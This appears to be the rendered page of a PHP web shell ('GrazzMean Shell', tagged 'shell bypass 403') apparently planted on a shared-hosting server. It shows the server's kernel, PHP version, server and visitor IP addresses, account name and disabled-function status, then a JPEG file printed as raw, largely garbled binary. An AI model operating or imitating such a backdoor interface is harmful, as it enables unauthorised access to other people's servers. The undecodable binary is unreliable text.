shell bypass 403

GrazzMean Shell

Uname: Linux premium264.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.3.22 [ PHP INFO ] PHP os: Linux
Server Ip: 69.57.162.13
Your Ip: 216.73.216.219
User: workvvfb (1129) | Group: workvvfb (1084)
Safe Mode: OFF
Disable Function:
NONE

name : new-file-36x19.jpg
���JFIF��ExifII*��/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:AF4293AAA50E11EC8A56D45DBFEAFC1E" xmpMM:DocumentID="xmp.did:AF4293ABA50E11EC8A56D45DBFEAFC1E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AF4293A8A50E11EC8A56D45DBFEAFC1E" stRef:documentID="xmp.did:AF4293A9A50E11EC8A56D45DBFEAFC1E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��C				

!'"#%%%),($+!$%$��C				$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$��$����.	!"Aa1q#2Qb��������(!1q"ABQa�����?�r7�[�v;��z,�B�[�iEՐ@�F�zp�E�Wc�x����2�TVQ��2�9Q���5� �X�D����Դ`B3�߃�8��dZd-����m@r=�Փ^��{����gn\b�fI�[}r��)�Vҝ���MUZI4h驴��5��6%,x
FAB�~e^�[2s��X��V����G������ډ�C3ա��H6=��Cv���Q�#�D)j�:�G�4��
D��d�Y�����dU�yn3��r�� ����0�cn�cّ��Dυ��v�0cd��Bt���B���$�S}��5���V`L69;�.f7��Q��yH�0�G���Id�ɸ�/-n�
2�Q�)M$�}�je�M���G*�ə�ËP[1c���)
��ָ"��+�mq��H��d0�좂��m�ħ�dQ�Ӊ=b��Ҟm�yi!JKo8�O�+F.%&+
��E1�Em����S�O�}��
© 2025 GrazzMean